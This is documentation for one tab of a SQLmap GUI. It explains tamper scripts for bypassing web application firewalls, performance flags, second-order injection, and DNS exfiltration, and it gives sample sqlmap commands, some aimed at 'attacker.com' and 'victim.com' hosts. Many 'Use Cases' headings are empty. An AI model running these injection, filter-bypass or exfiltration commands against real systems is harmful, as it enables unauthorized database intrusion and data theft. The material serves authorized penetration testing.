SQLmap-GUI

Miscellaneous Tab - Advanced and Specialized SQLmap Options

The Miscellaneous tab contains advanced and specialized SQLmap options that don’t fit into other categories, including tamper scripts, optimization settings, and experimental features.

📋 Overview

The Miscellaneous tab contains four main sections:

  1. Tamper Scripts - WAF bypass and payload modification
  2. Optimization - Performance and efficiency options
  3. Miscellaneous Options - Various utility options
  4. Experimental Features - Cutting-edge and beta features

🛡️ Tamper Scripts

Tamper Script Selection

Parameter: --tamper=TAMPERS Description: Use tamper scripts to bypass WAF/filtering Format: Comma-separated list of tamper names Examples:

--tamper=space2comment
--tamper=apostrophemask,randomcase
--tamper=space2comment,versionedkeywords,space2plus

Use Cases:

Available Tamper Scripts

Character Replacement

Space Manipulation

Keyword Obfuscation

Advanced Techniques

Custom Tamper Scripts

Parameter: --tamper=/path/to/custom_tamper.py Description: Use custom tamper script Requirements: Python script following SQLmap tamper API Use Cases:

⚡ Optimization Options

Keep Alive

Parameter: --keep-alive Description: Use persistent HTTP connections Behavior: Reuses TCP connections for multiple requests Use Cases:

Null Connection

Parameter: --null-connection Description: Retrieve page length without actual content Behavior: Uses HEAD requests to check response sizes Use Cases:

Concurrent HTTP Requests

Parameter: --threads=NUM Description: Maximum number of concurrent HTTP requests Default: 1 Range: 1-10 Examples:

--threads=5
--threads=10

Use Cases:

Predict Output

Parameter: --predict-output Description: Predict common queries output Behavior: Uses heuristics to predict query results Use Cases:

Skip Heuristics

Parameter: --skip-heuristics Description: Skip heuristic detection mechanisms Behavior: Disables intelligent detection Use Cases:

🔧 Miscellaneous Options

Skip URL Encoding

Parameter: --skip-urlencode Description: Skip URL encoding of payload data Behavior: Sends payloads as-is Use Cases:

Chunked Transfer Encoding

Parameter: --chunked Description: Use HTTP chunked transfer encoding Behavior: Sends data in chunks Use Cases:

Force SSL

Parameter: --force-ssl Description: Force usage of SSL/HTTPS requests Behavior: Converts HTTP to HTTPS Use Cases:

Force Redirects

Parameter: --follow-redirects Description: Follow HTTP redirects Behavior: Automatically follows 3xx responses Use Cases:

Ignore Proxy

Parameter: --ignore-proxy Description: Ignore system default proxy settings Behavior: Bypasses proxy configuration Use Cases:

Disable Color Output

Parameter: --disable-coloring Description: Disable colored console output Behavior: Plain text output Use Cases:

Force DNS Exfiltration

Parameter: --dns-domain=DOMAIN Description: Use DNS exfiltration technique Behavior: Exfiltrates data via DNS queries Examples:

--dns-domain=attacker.com
--dns-domain=test.example.com

Use Cases:

Second-Order Injection

Parameter: --second-order=URL Description: Detect and exploit second-order SQL injection Behavior: Tests for delayed injection effects Examples:

--second-order=http://victim.com/profile.php?id=1
--second-order=http://victim.com/search.php?q=inject

Use Cases:

🧪 Experimental Features

3rd Level Domain

Parameter: --3rd-level-domain Description: Use 3rd level domain for DNS exfiltration Behavior: Creates subdomains for data exfiltration Use Cases:

Alert Filtering

Parameter: --alert=ALERT Description: Run host OS command(s) when SQL injection found Examples:

--alert="notify-send 'SQLi found'"
--alert="curl http://attacker.com/alert"
--alert="echo 'Vulnerability detected' >> /var/log/alerts.log"

Use Cases:

Beep When Vulnerable

Parameter: --beep Description: Beep when SQL injection is found Behavior: Audio notification on discovery Use Cases:

Cleanup Database

Parameter: --cleanup Description: Clean up SQLmap temporary tables and files Behavior: Removes injection artifacts Use Cases:

Dependencies Check

Parameter: --dependencies Description: Check for missing dependencies Behavior: Verifies required libraries and tools Use Cases:

📝 Usage Examples

WAF Bypass with Tamper Scripts

Tamper Scripts: space2comment,randomcase,apostrophemask
Keep Alive: ✓ Enabled
Threads: 5

Generated Command:

sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,randomcase,apostrophemask --keep-alive --threads=5

Performance Optimization

Null Connection: ✓ Enabled
Predict Output: ✓ Enabled
Concurrent Requests: 8
Skip Heuristics: ✗ Disabled

Generated Command:

sqlmap -u "http://example.com/admin.php?id=1" --null-connection --predict-output --threads=8

SSL and Redirect Handling

Force SSL: ✓ Enabled
Follow Redirects: ✓ Enabled
Chunked Encoding: ✓ Enabled

Generated Command:

sqlmap -u "http://example.com/secure.php?id=1" --force-ssl --follow-redirects --chunked

DNS Exfiltration

DNS Domain: attacker.com
3rd Level Domain: ✓ Enabled
Ignore Proxy: ✓ Enabled

Generated Command:

sqlmap -u "http://example.com/restricted.php?id=1" --dns-domain=attacker.com --3rd-level-domain --ignore-proxy

Second-Order Injection Testing

Second Order: http://victim.com/profile.php?id=1
Alert Command: notify-send 'Second-order SQLi found'
Beep: ✓ Enabled

Generated Command:

sqlmap -u "http://example.com/input.php" --second-order=http://victim.com/profile.php?id=1 --alert="notify-send 'Second-order SQLi found'" --beep

Comprehensive Miscellaneous Configuration

Tamper Scripts: space2comment,base64encode
Keep Alive: ✓ Enabled
Null Connection: ✓ Enabled
Threads: 3
Predict Output: ✓ Enabled
Force SSL: ✓ Enabled
Disable Coloring: ✓ Enabled

Generated Command:

sqlmap -u "http://example.com/complex.php?id=1" --tamper=space2comment,base64encode --keep-alive --null-connection --threads=3 --predict-output --force-ssl --disable-coloring

⚠️ Important Considerations

Tamper Script Selection

Performance Tuning

Experimental Features

Security Implications

🔧 Troubleshooting

Tamper Scripts Not Working

Problem: WAF still blocking despite tamper scripts Solutions:

  1. Try different tamper combinations
  2. Test tamper scripts individually
  3. Check WAF type and rules
  4. Use custom tamper scripts

Performance Issues

Problem: Scanning too slow or resource intensive Solutions:

  1. Reduce thread count
  2. Enable null connection
  3. Use predict output
  4. Disable unnecessary features

SSL/HTTPS Problems

Problem: SSL connection issues Solutions:

  1. Check SSL certificate validity
  2. Use –force-ssl appropriately
  3. Verify HTTPS support
  4. Check proxy SSL handling

DNS Exfiltration Not Working

Problem: DNS exfiltration failing Solutions:

  1. Verify DNS server control
  2. Check firewall DNS rules
  3. Test DNS resolution
  4. Use different domain

Experimental Feature Issues

Problem: Experimental features not working Solutions:

  1. Check SQLmap version compatibility
  2. Verify feature requirements
  3. Test in controlled environment
  4. Check for known issues
/home/devil/Desktop/SQLmap-GUI-Advanced-SQL-Injection-Testing-Interface/docs/tabs/miscellaneous.md